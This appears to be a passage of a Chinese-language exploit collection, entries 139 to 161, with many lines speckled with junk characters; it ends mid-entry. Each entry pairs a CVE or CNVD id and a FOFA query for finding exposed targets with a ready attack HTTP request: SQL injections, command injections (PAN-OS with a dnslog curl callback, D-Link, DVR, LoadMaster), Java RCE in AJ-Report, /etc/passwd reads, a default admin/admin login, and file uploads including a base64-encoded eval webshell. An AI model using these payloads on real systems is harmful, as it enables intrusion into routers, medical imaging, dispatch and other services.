& v: ^7 Z: y8 D7 [( e' j& g; R) E5 n- q2 X. o5 @9 q* q0 n
139. 福建科立讯通信指挥调度平台editemedia.php sql注入& N2 s/ @: U4 g: S1 U4 e; ?2 Y
CVE-2024-2622
6 M" ]- Q8 H8 rFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
" ?% @3 v" y* L6 c. Y0 P* TGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
?6 E% ?! |& C; V' x) W6 oHost: x.x.x.x1 F& s. S& b Q; Q, g) f* |6 R4 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.01 Y. s- a0 ]6 e* Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# Y# E; [2 k; X8 m/ H: E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 i1 N8 G1 W/ ]8 H3 a& m' HAccept-Encoding: gzip, deflate, br
. h" J$ Z" S$ nConnection: close; M* O8 h4 m$ i3 n; B! s! U8 Q, z( u
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
( _- Q$ x. m1 b$ v9 UUpgrade-Insecure-Requests: 1
" o8 Z* B _- n& ^( p1 l- @7 D ~ `, q/ |/ o# c0 n) p0 p0 I
* o" d7 G) z1 Y: C! _4 D140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& J+ |/ P9 K" ~9 ~0 r# yCVE-2024-2566' f9 ^+ n/ d9 t+ K
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 x' g8 s- [# t+ l7 I+ r- V0 cGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
7 G @ |: ?6 D3 I$ ZHost: x.x.x.x
, f! Y; D' a1 z" G" f7 R0 i. d ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 S6 U. z# E8 t+ F6 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 M& X; J0 a, s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* @8 C( C+ p4 u1 r8 B
Accept-Encoding: gzip, deflate, br, p4 V" n! h- l5 y
Connection: close
) B1 N. d9 x# b6 c# MCookie: authcode=h8g99 e1 A, d& I3 V+ k1 N" ?
Upgrade-Insecure-Requests: 15 F4 `$ K) q) U+ f! A, X
1 Y/ R0 Q) p) `* m# C9 h2 H; Z3 C. p& c: v5 o& B8 k0 ]
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入8 h3 [! Z9 P8 ?# h& m* \. z5 |9 A, E. X
FOFA:body="指挥调度管理平台"5 v N# J! |; ~
POST /app/ext/ajax_users.php HTTP/1.1
# D9 Q$ ^4 O( i6 T: m! R$ oHost: your-ip; e0 B6 b4 N1 R
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
6 _6 |* s2 ?. ~, ^5 sContent-Type: application/x-www-form-urlencoded$ ]" j" f9 y% R3 h
! Z" d! P& b, Q9 q0 d6 ^# N
* W$ A3 w0 b K( U$ g6 l& L: Hdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
: _, \; z( X+ t- F/ o3 O0 \
$ U- R% L6 {8 _1 z6 W6 I( |; h0 N8 C& {, V9 J' X' L4 Q
142. CMSV6车辆监控平台系统中存在弱密码# r# S8 G' [$ b+ l! V2 s! }) x# t+ r
CVE-2024-296664 a/ R, f; I: u' o d
FOFA:body="/808gps/"
# B+ N$ @- }; e' l6 X0 {' iadmin/admin+ H! o! [8 i( ]5 p
143. Netis WF2780 v2.1.40144 远程命令执行
0 e+ M3 F6 l% TCVE-2024-25850
2 \7 K5 O0 a# YFOFA:title='AP setup' && header='netis'+ _- b+ I7 ]7 P; m) o, S
PAYLOAD i- x1 U0 Z! w- Z) d" d/ ^1 s6 G
' D' A8 w3 M& u1 e2 b6 @/ [144. D-Link nas_sharing.cgi 命令注入3 w# Z9 r5 X/ z9 p7 g; s
FOFA:app="D_Link-DNS-ShareCenter" v7 S0 {! } F H& t- O$ o: E
system参数用于传要执行的命令
, D8 N1 _9 _ F7 r9 _" a& P" VGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
1 U& E- v y* w% SHost: x.x.x.x
- _4 z# k/ o% m' gUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
9 `8 A" b2 ]9 z& }" z$ O6 tConnection: close
, S2 h0 g7 e* X; E& D, ~# kAccept: */*
2 A4 n; Z& e8 Y- D. b1 dAccept-Language: en
" T/ `$ u4 {* D* j& s4 D8 pAccept-Encoding: gzip
/ J, t- [- _/ S0 u( Q2 J
" E' G4 B( O: O0 m
5 `+ r6 ~2 O/ [' f6 z% r145. Palo Alto Networks PAN-OS GlobalProtect 命令注入; o& [8 Y; t' U; D
CVE-2024-3400
/ s+ s* M7 Y% t# t2 ~5 pFOFA:icon_hash="-631559155"
; o5 w- P- n S4 [GET /global-protect/login.esp HTTP/1.1
: N# Z6 T* P0 L2 _$ E4 W$ V, H; @Host: 192.168.30.112:10051 p# _. q( {1 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84( G5 P! w u- |$ |) x
Connection: close9 h" O& @* ?* f. L& @
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
9 n* S- n. Y( t8 k# F% D) @Accept-Encoding: gzip. B% o6 G7 K4 k0 r0 A: v
2 E3 y& X' Y; y# B+ U9 }, e: e |: r; N
146. MajorDoMo thumb.php 未授权远程代码执行
* W/ G+ y" t. [CNVD-2024-02175" o9 n5 C, r5 k5 m _8 o
FOFA:app="MajordomoSL"0 h7 Q4 f$ n% p
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
" Q& Q; z9 L& j8 U( nHost: x.x.x.x
& }) |5 A8 V0 ?. UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
, I* L7 P0 N$ H7 {- GAccept-Charset: utf-8) K) ?( U0 C: D0 w
Accept-Encoding: gzip, deflate
/ _; S4 i l+ dConnection: close
; M7 o( H& C6 n( R
% a: h; L8 S& w* i/ J/ \9 t0 F0 R
& K9 N' |' X; M2 D- p147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
. G+ B9 |" ]# l5 Q" {CVE-2024-32399! e- s0 w* @% t( N& c
FOFA:body="RaidenMAILD"
! ^+ \5 ]1 Q- B* H0 L" F2 yGET /webeditor/../../../windows/win.ini HTTP/1.1) T1 ~% v2 U# `
Host: 127.0.0.1:81 }: c; `- o8 w. G/ z7 C5 H4 g
Cache-Control: max-age=0, J5 v& w, j; T8 ] T* E. d- U
Connection: close
7 ~: e7 X+ h% V2 e; g
! K/ S5 V& [5 _; g/ l: s7 ], O5 _& M0 R! O1 q
148. CrushFTP 认证绕过模板注入 E& [8 f, j) o- M' v0 C+ M
CVE-2024-40409 z2 L* A. v; b. C& b
FOFA:body="CrushFTP"
& v" u4 {# Q# |* u# F( pPAYLOAD
* `+ S: O; h! s9 s* }8 b
, O- U0 K" u$ a3 s% f: ~3 q5 E1 Q149. AJ-Report开源数据大屏存在远程命令执行
# W0 ]; g3 T" rFOFA:title="AJ-Report"
4 V6 F+ N L1 X+ b; C6 p: k& q" Q* k+ h" I9 F8 f; P b9 y
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
" S: b, w: z, n5 O: S5 hHost: x.x.x.x
( R7 _$ `; H8 ]4 P' a" e" U L$ pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 p' D6 c- d3 c2 T5 E! Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 K- \* ]9 A) ?0 z
Accept-Encoding: gzip, deflate, br7 _2 m$ N i2 _' X
Accept-Language: zh-CN,zh;q=0.9, u: u$ G" V; }) h. B
Content-Type: application/json;charset=UTF-8
4 d% G ?" T' K, fConnection: close. K2 F4 s; g; H5 H) `' B8 {. e
6 M! `6 Z' f$ s! H+ j8 X, n' g{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}' |8 |6 J/ U% c8 f" B' Z, w4 K, l% f
, X! a9 p, J7 J: [150. AJ-Report 1.4.0 认证绕过与远程代码执行
; y' X4 L6 G% I5 VFOFA:title="AJ-Report"1 \0 r* ?( n6 {" n" X$ S9 d4 B
POST /dataSetParam/verification;swagger-ui/ HTTP/1.15 l* Q9 O+ b; R- P" p( I
Host: x.x.x.x
" O9 E# }; ~5 j( \- K jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- a# V/ s# V* o/ k7 u, ]# Z( z0 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: z5 z* G' F" z- kAccept-Encoding: gzip, deflate, br
, @$ ~$ Z! c* I; q2 _Accept-Language: zh-CN,zh;q=0.9' ]: ?3 w& E( y' d& f6 z" m8 W
Content-Type: application/json;charset=UTF-8
+ Z/ j, N5 x- X. ^" d0 l% nConnection: close8 r3 t) O% y, ?1 S+ Q0 f6 T+ v- c
Content-Length: 339
0 {) p9 ^5 t" R# o- k# H' ~. `$ ?1 \( Z s1 q
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
# _5 ~/ b9 u) g9 K0 {
! }# M/ y& Y, ?( F7 P
: W( X. a" K0 [; P6 \5 m9 L151. AJ-Report 1.4.1 pageList sql注入5 p; O) K8 g# A9 l
FOFA:title="AJ-Report"! k O6 }) @+ q! h9 T. o7 W
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
, x( T) u) T& r9 @Host: x.x.x.x Z5 n* D3 H J- v& z: `- a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; ^0 v* B% c" `5 F0 Q
Connection: close' _8 {$ l; j1 } F0 c* J
Accept-Encoding: gzip3 T0 }: E9 z# [' l% p t' {
7 _3 l3 N' D/ I" w1 B: \
5 `3 M8 g& i- a' X' a# w+ q152. Progress Kemp LoadMaster 远程命令执行+ M! i$ B$ s) ~8 v$ Q$ |. q0 {
CVE-2024-1212
$ ~0 v" B' j$ A* {( F7 kLoadMaster <= 7.2.59.2 (GA)
/ m4 x) O0 ?1 \# I: P" eLoadMaster<=7.2.54.8 (LTSF)( N& y- V( O$ L
LoadMaster <= 7.2.48.10 (LTS)
) [2 l9 l+ C+ m! f8 FFOFA:body="LoadMaster"9 d. b8 `% N; d/ B, f7 | h' v
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码$ e( S3 k1 D: t/ r d, O
GET /access/set?param=enableapi&value=1 HTTP/1.1- r2 g" v* A/ X# j# O5 C
Host: x.x.x.x
$ ~. b7 P. D( O% H* J2 W$ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.19 S' ?) G o8 O" T0 b7 `0 A$ a1 ]; y
Connection: close5 u8 p, u4 M- c% A; i4 [
Accept: */*4 o7 [' `* }1 b" D* n* L
Accept-Language: en
$ e" j' E1 ?/ z7 I' NAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
' e8 w% a2 {* IAccept-Encoding: gzip
+ `9 [0 V! [# f2 A, q8 s
3 s/ b7 c1 U; P5 ^& }3 J" ~! F9 Z% e) `3 B; m) Q+ W( @, z
153. gradio任意文件读取
* j P. ~$ L& SCVE-2024-1561FOFA:body="__gradio_mode__"- _6 Q$ r' L- \/ Y$ N% } k& b3 F
第一步,请求/config文件获取componets的id
: j! h) g8 v" b5 _ Z% E, Mhttp://x.x.x.x/config
9 M" _/ [$ a* R5 f
* A8 p$ [, h5 _% u: L
, `. r D- O6 W' y/ w9 t0 G8 c第二步,将/etc/passwd的内容写入到一个临时文件) U5 Z7 w) y) L! H
POST /component_server HTTP/1.1& @4 F1 N) F3 g
Host: x.x.x.x9 u5 g' T( R& C/ D# _" n8 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
# s6 @6 Q# `: l1 f) B5 Q' SConnection: close
2 `8 ~+ U6 ~8 u) QContent-Length: 115
$ w/ {! V0 W2 [+ ^Content-Type: application/json9 ?1 _* t3 `% a! ?" R8 q
Accept-Encoding: gzip
" X% _ F# p: ~6 s9 i; s9 X& l
; l3 T/ D4 r. s) @{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}) I# g: |" ^( X3 F
8 q" ?; o* z1 \" ?; J" n
* I3 B4 r8 H' h# y$ n第三步访问& n% I0 m+ Y) L; x
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
7 m5 H$ c3 \) S F D1 `5 L a3 c( s$ h$ Z, T. ^! b
. A+ D- `9 e S1 k6 ?5 U
154. 天维尔消防救援作战调度平台 SQL注入
. B3 X' I" R( g5 E6 nCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入": s0 L8 l* M8 k: ~
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
- S0 W1 t A0 B _ {9 fHost: x.x.x.x
% v5 w3 R) j5 n5 \ O, i; j4 t; pContent-Length: 106, f0 w# `- H8 J7 s8 g
Cache-Control: max-age=0
2 ]- {9 B- e& ~3 `3 [3 s: x NUpgrade-Insecure-Requests: 1; k/ I3 |/ h; K) R1 ?4 G1 L) t
Origin: http://x.x.x.x: E, e/ @+ ]$ J9 J q
Content-Type: application/json
# E: N0 i) n, ?/ w& I* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.367 b- P' q( j6 |) q( ]- f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 F- F: Q' P- E1 h- nReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
; o& J7 O" f7 T1 V. `Accept-Encoding: gzip, deflate$ \0 t+ C1 q1 J5 U" r# N ~& S
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
, t" V5 a5 J+ f1 T9 j8 mConnection: close+ t- O/ T2 C+ Z! E' B
) S* I2 n2 f q: O; e3 g; L9 _
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}0 Q7 l- S5 ~; n
: a. F& ~3 C O2 I4 s5 q C* C6 B- T+ N. [5 Z
155. 六零导航页 file.php 任意文件上传
. C- i% b$ h6 j3 _" Q& d7 xCVE-2024-34982
+ V. C3 H6 ~" w+ s4 `FOFA:title=="上网导航 - LyLme Spage"6 _4 s5 x& W% h5 V5 \% s
POST /include/file.php HTTP/1.1
7 J3 |, g5 m+ QHost: x.x.x.x
8 S3 O* F8 P. }* G' J& WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0' L+ n) v1 l- q' s! V$ ?- @$ b
Connection: close
0 L4 l6 b$ a! wContent-Length: 232
$ g R5 D- S4 qAccept: application/json, text/javascript, */*; q=0.01" F: v. y) l" X5 i1 U+ `6 `6 m9 [
Accept-Encoding: gzip, deflate, br( c1 i; c$ i* J: M6 M2 g8 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; d6 y. O4 h$ r, a5 T3 G. aContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f1 ?, C8 q* F9 [; ^
X-Requested-With: XMLHttpRequest
* R+ r, \# E/ ]( Z
( c' ~$ o( [/ v2 p9 X, e-----------------------------qttl7vemrsold314zg0f
5 U" H& p4 a- G: n) ^! I! v7 y% dContent-Disposition: form-data; name="file"; filename="test.php"" e" |1 [- Z# ?& [" j
Content-Type: image/png
% i$ [6 ^5 L$ L1 v# A' {7 w9 L/ q/ ^' U, }- r2 ?, E
<?php phpinfo();unlink(__FILE__);?>' a G+ e) Y d1 d) g+ y# D! k% \: o
-----------------------------qttl7vemrsold314zg0f--
" m4 x5 k- n- @" W X4 Z# e0 H- b1 Q3 t6 u3 m) S3 `& f. S
2 O' ]) |3 ?$ G: D
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php3 u4 B0 i; Q* y! ]7 ~$ \9 H- \
' B, E. f0 E/ @: Z3 I9 ~; M
156. TBK DVR-4104/DVR-4216 操作系统命令注入" t2 l; k' q. u' @( ]5 p8 y
CVE-2024-3721
- p; _' U1 j9 kFOFA:"Location: /login.rsp"' N1 Q9 r! H2 c8 }; ?
·TBK DVR-4104( u. I/ w- \8 O' T0 s4 [/ l
·TBK DVR-4216. E+ g; x! O1 Q1 `
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
3 D+ [0 N9 I+ m
- j P% r4 O; I# r% s! c7 F5 n) {8 [
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.18 c! @$ U2 _& K* [# N: k- T% H
Host: x.x.x.x8 Q8 q! G- n' }/ ~" B! {& K+ s& g2 T
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 ?1 Z. p' o f5 c, S, _! S6 c
Connection: close
* }( K6 L6 r- k2 R! ?2 b+ e0 rContent-Length: 0
3 G, c: u. g5 V( V( b9 I6 g1 q5 LCookie: uid=1
' I o% U4 T* D% ]; j# t5 GAccept-Encoding: gzip
( R/ n8 `1 U& K
2 N3 M2 J+ Y7 {* I1 b/ i
& `6 B3 I+ `; V( e4 I157. 美特CRM upload.jsp 任意文件上传# U6 s6 \. W! b" V4 t& G
CNVD-2023-06971
, w, \: K+ p5 R% j# uFOFA:body="/common/scripts/basic.js"; S5 |4 q8 ^8 T5 J* N
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
& h ]% I7 p& f5 M5 Y" q1 B. PHost: x.x.x.x
4 ]" Y% q% V" |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
: K8 x- |- ]% k Z4 SContent-Length: 709+ ~/ n) X1 A) F: g j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 w0 d! ]% P* b9 J1 N' a
Accept-Encoding: gzip, deflate- |' h t* S& Z" \7 K& O- Z
Accept-Language: zh-CN,zh;q=0.90 g$ s f2 z: _/ V4 L
Cache-Control: max-age=0
" x6 K/ W* r4 nConnection: close
A: P6 K r7 `. I2 a( cContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
* H6 j2 g; H9 cUpgrade-Insecure-Requests: 10 ?( Z% u% j/ S5 h, R$ \( H3 Z6 o' e
0 v: z' P# v, r) P6 r5 c' R$ B% w- C+ M
------WebKitFormBoundary1imovELzPsfzp5dN6 f" C8 }9 J0 T7 F7 V
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
' B# x, _. \- r( ]2 vContent-Type: application/octet-stream
! S: d4 d& |7 f. P
/ t$ v' W+ m! ?% X" u' h9 Z! c# d. `nyhelxrutzwhrsvsrafb
6 \" E8 A$ p( |# X------WebKitFormBoundary1imovELzPsfzp5dN* u' D& i2 N# K+ d3 Y3 F
Content-Disposition: form-data; name="key"! e; e2 ] d0 r( V: ~9 E
. B# |+ |& C/ Q+ v2 m, J$ _
null
8 T* W) W9 F( f: a------WebKitFormBoundary1imovELzPsfzp5dN
+ G# M" C- Q n8 c* ]3 k LContent-Disposition: form-data; name="form" t0 c8 Z# K8 R9 z
- d+ W& i- j* S
null
8 Q- Z( H3 V' F6 T& J' }. X z------WebKitFormBoundary1imovELzPsfzp5dN7 P7 R1 B2 ?: B" m
Content-Disposition: form-data; name="field": L8 ~& T4 ^, u' v9 l: d( _; F
' B4 z% f" n0 B2 \0 ]' E9 Onull
6 t# o, ]6 {8 b/ D------WebKitFormBoundary1imovELzPsfzp5dN {4 Z% y7 `3 V w
Content-Disposition: form-data; name="filetitile"1 ]7 N0 P* y a& c' Y: D- ~
/ s# L. p+ V- M
null
) K/ s) y" o* q0 |------WebKitFormBoundary1imovELzPsfzp5dN+ @5 {/ y( S- R8 \% b
Content-Disposition: form-data; name="filefolder" V, y/ g0 P% i% A! ~& x% F5 {2 ?
1 ^9 i1 v2 T; D! ?: b! V
null+ b* _% R3 T v
------WebKitFormBoundary1imovELzPsfzp5dN--
0 t4 A+ D. d# h2 J
3 D2 H+ p# }3 O) ?5 b# N) S1 m; e1 B' p0 I$ D: c; i& f+ v; _% h1 K, @
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp% p! x" `$ ?; }+ @. n
. c, b# \; p, R% Z1 C M/ |
158. Mura-CMS-processAsyncObject存在SQL注入
0 O" q) f! M" m6 JCVE-2024-326407 s6 V% J8 Y7 Y: @6 Q9 G
FOFA:"Generator: Masa CMS"* g/ N' q$ @- i. s! q+ C
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1# B8 Q2 K% f* _0 m8 m% Z# q* @
Host: {{Hostname}}
9 u+ P5 n0 a2 B1 Y- t5 YContent-Type: application/x-www-form-urlencoded$ ^! ?! N; P# R E$ J. U
) C0 V1 D2 O( ]) r, |* q8 c6 N. a, Xobject=displayregion&contenthistid=x\'&previewid=1
! S7 T/ A1 h3 u4 o* K, ^1 a W4 U2 u7 f6 ]! E
3 b5 B @, @8 C1 h4 I o# ^2 q159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
$ ?/ C" S) s) D. pFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")! H' w6 v, s- o# c
POST /webservices/WebJobUpload.asmx HTTP/1.1: }6 v8 v/ n1 F9 N0 W5 ]/ x
Host: x.x.x.x5 _ W3 z8 T6 S7 o" ?6 n( ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" h( N! `& j6 w R( N" c) h
Content-Length: 1080* f- R/ c: G4 s0 z
Accept-Encoding: gzip, deflate
& X9 d( z1 f% U# G4 W+ fConnection: close
8 p+ q9 x7 j5 ?* L, ~$ [5 C* e5 b6 {: OContent-Type: text/xml; charset=utf-81 `) o% V n) I2 H" Y( ?6 P8 S
Soapaction: "http://rainier/jobUpload"2 f- m" L& F( d; l3 b& V/ Z2 L
0 A; Y8 s) _, }5 [<?xml version="1.0" encoding="utf-8"?>
r7 h( w- G& j+ T) ~3 ?; g9 f/ N<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> x; c8 [2 L. m. E: {/ N
<soap:Body>2 I8 K! X( e; Q3 y( f
<jobUpload xmlns="http://rainier">! D' R! _# v/ C' g8 O% M' \
<vcode>1</vcode>0 v- a5 i2 c9 K0 o3 d3 L
<subFolder></subFolder>
2 G% m% V5 }7 b$ P4 m* F& j) x' U<fileName>abcrce.asmx</fileName>
. T# k; e' I6 O' V6 Y<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
" c$ j# L$ k- s' d8 c( P9 s</jobUpload>+ h, Q) r0 C+ F( ]
</soap:Body>
9 W* B. m0 [1 ]2 k4 d</soap:Envelope>- b% b( l4 m X( V! R6 w( ? {* s
: b1 y6 T; q, Q, @1 n
# x2 N K) N% {: y& H, }/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")9 i) t& T- Z, c" `
4 R! H$ k8 }2 H+ i
$ O8 I. o9 u% c7 r3 t- ?$ u% r4 \160. Sonatype Nexus Repository 3目录遍历与文件读取
: O9 Z7 M1 d% jCVE-2024-4956
5 ]" B- v' C# @, h& nFOFA:title="Nexus Repository Manager"- P" w9 m2 v6 m% \. e
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
2 o7 N0 Z, ?+ d9 b- \% fHost: x.x.x.x/ W- N% n* c0 B- s% D, E3 g; Y ?
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
7 l8 G) J9 J6 _& ?7 E& tConnection: close
1 D( e1 g. S1 F1 AAccept: */*
3 W: e) [/ A+ E+ g. m5 a8 JAccept-Language: en
* a4 S( |3 s; t5 \3 E. N) ^7 [8 YAccept-Encoding: gzip
! n0 ?& _6 e! P: o2 ~2 N) N2 c S# b$ `( u4 C. X6 g
" ~6 W+ C' e* w0 U$ Q+ D- O! t$ ^) X161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
* h; k7 _ R0 E; C" j' BFOFA:body="/KT_Css/qd_defaul.css"; ~1 y7 T( U* P* V: u5 ^; E8 c
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密 b: E; @! O9 H8 N3 k1 s
POST /Webservice.asmx HTTP/1.1
6 l/ q" Z4 e$ jHost: x.x.x.x
- h+ Z5 z [7 `$ |' }# u0 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
; F7 D$ K/ l' e" r0 T, }Connection: close+ _* @. e6 U: o7 i3 m
Content-Length: 445
' |. I( g$ c# ~# z: CContent-Type: text/xml
, h/ R4 N: j3 {9 l% L: J. r) nAccept-Encoding: gzip k# K8 Q# x+ P- W V
' s0 K1 @! @ i8 L2 y6 m9 w3 G
<?xml version="1.0" encoding="utf-8"?>
